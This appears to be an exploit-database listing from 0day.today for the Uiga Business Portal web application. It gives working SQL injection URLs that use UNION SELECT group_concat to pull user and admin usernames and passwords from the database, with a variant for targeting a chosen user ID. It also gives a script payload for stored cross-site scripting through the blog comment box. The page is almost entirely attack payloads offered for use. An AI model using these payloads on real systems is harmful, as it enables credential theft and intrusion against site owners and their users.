[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Uiga Business Portal SQL/ XSS Vulnerability

Author
Sioma Labs
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-10791
Category
web applications
Date add
07-02-2010
Platform
unsorted
===========================================
Uiga Business Portal SQL/ XSS Vulnerability
===========================================


# Exploit Title: Uiga Business Portal SQL/ XSS Vulnerability
# Date: 8/2/2010
# Author: Sioma Labs
# Site : http://www.scriptdevelopers.net
# Software Link: http://www.scriptdevelopers.net/download/uigapersonalportal.zip
# Version: N/A
# Tested on:
     
    Linux
     
    OS = Cent OS 5.4
    Server = Apache/2.2.3
    SQLDB = MYSQL v5.0.77
     
    Windows
     
    OS = Windows XPsp2
    App = Wamp
         
 
# CVE : N/A
# Code : N/A
 
 
----------------------------------------------------
 __ _                           __       _        
/ _(_) ___  _ __ ___   __ _    / /  __ _| |__  ___
\ \| |/ _ \| '_ ` _ \ / _` |  / /  / _` | '_ \/ __|
_\ \ | (_) | | | | | | (_| | / /___ (_| | |_) \__ \
\__/_|\___/|_| |_| |_|\__,_| \____/\__,_|_.__/|___/
                                                    
----------------------------------------------------
 
 
 
SQL Injection Vulnerability
 
UserAge : [host]/blog/index.php?view=noentryid&noentryid=[SQLi]
 
 
 
- User SQLi ->
--------------
 
Ex : http://server/ulgabusinessportak/blog/index.php?view=noentryid&noentryid=-20+Union+All+Select+1,2,3,4,5,group_concat(user_id,0x3a,username,0x3a,password),7,8,9,10+from+tbl_user--
 
 
- Admin SQLi ->
---------------
 
Ex : http://server/ulgabusinessportak/index2.php?c=29&p=-45+Union+All+Select 1,group_concat(admin_id,0x3a,admin_name,0x3a,admin_password),3,4,5+from+admin--
 
 
- Or Choice By User ID ->
--------------------------
 
http://server/ulgabusinessportak/blog/index.php?view=noentryid&noentryid=-20+Union+All+select+1,2,3,4,5,group_concat(username,0x3a,password),7,8,9,10+from+tbl_user+where+user_id=1--
 
*/ Change the last User ID
 
#######################################################################################################
 
 
 
XSS Vulnerability
--------
 
- You can inject html with the comment box
 
Test Link
http://server/ulgabusinessportak/blog/index.php?view=noentryid&noentryid=20
 
 
Inject "<script>alert("XSS")</script>" into the portal using Comment Box



#  0day.today [2024-12-24]  #